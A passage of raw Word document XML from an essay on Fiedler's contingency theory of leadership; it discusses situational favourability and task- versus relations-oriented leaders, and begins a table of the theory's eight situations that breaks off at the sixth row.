        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">favourable to the leader if the leader </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t>esteemed by the gr</w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t xml:space="preserve">oup; if the task </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>structured</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">; and if the leader </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">legitimacy and power by virtue of his or her position. The </w:t>
      </w:r>
      <w:r w:rsidR="00561B38" w:rsidRPr="00561B38">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>task oriented</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> leader </w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">most likely to be effective in situations that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00561B38" w:rsidRPr="00561B38">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>most</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> favourable or </w:t>
      </w:r>
      <w:r w:rsidR="00561B38" w:rsidRPr="00561B38">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">most </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">unfavourable to him or her. The </w:t>
      </w:r>
      <w:r w:rsidR="00561B38" w:rsidRPr="00561B38">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>relations oriented</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> leader </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t>most likely to be effective in situations betwe</w:t>
      </w:r>
      <w:r w:rsidR="001F78DF">
        <w:t>en the two extremes</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">. Fiedler’s </w:t>
      </w:r>
      <w:r w:rsidR="001105EE">
        <w:t xml:space="preserve">research and </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t>theory suggest</w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> that instead of developing </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t xml:space="preserve">adaptable </w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t>leaders, the leader ought to be placed situation</w:t>
      </w:r>
      <w:r w:rsidR="001105EE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> best suited</w:t>
      </w:r>
      <w:r w:rsidR="001105EE">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001105EE">
        <w:t xml:space="preserve">and failing that, </w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve">situations </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ought to be </w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve">manipulated </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>to suit</w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="007E4CBA">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002C0FC1">
        <w:t xml:space="preserve"> orientation</w:t>
      </w:r>
      <w:r w:rsidR="001F78DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-168411546"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001F78DF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001F78DF">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="001F78DF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001F78DF" w:rsidRPr="001F78DF">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="001F78DF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00561B38">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="001F78DF">
        <w:t xml:space="preserve">ossible changes include varying the structure of the task or </w:t>
      </w:r>
      <w:r w:rsidR="001C6617">
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="001F78DF">
        <w:t xml:space="preserve"> to improve leader-member relations. </w:t>
      </w:r>
      <w:r w:rsidR="0026661E">
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">igure </w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026661E">
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a breakdown of the eight situations and</w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> most effective leader for each. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableList3"/>
        <w:tblW w:w="9211" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        <w:tblCaption w:val="Contingency theory's eight possible situations and most effective leader for each"/>
        <w:tblDescription w:val="Each row describes one of eight combintations of situational factors and the most effective leader style for each. The situational factors are leader-member relations - either good or poor; task strucutre - either structured or unstructured; and the leader's position power - either weak or strong. The final column suggests what the most effective leader style for each situation is - either one with a low least-preferred co-worker score or a high least-preferred co-worker score. "/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="2264"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="2127"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:hRule="exact" w:val="312"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D61889" w:rsidRPr="00EE501F" w:rsidRDefault="00426190" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00426190">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Leader-Member Relations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Task Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Leader's Position Power</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Most Effective Leader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Strong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Task-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Task-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unstructured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Strong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Task-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unstructured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Relations-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Poor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Strong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Relations-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
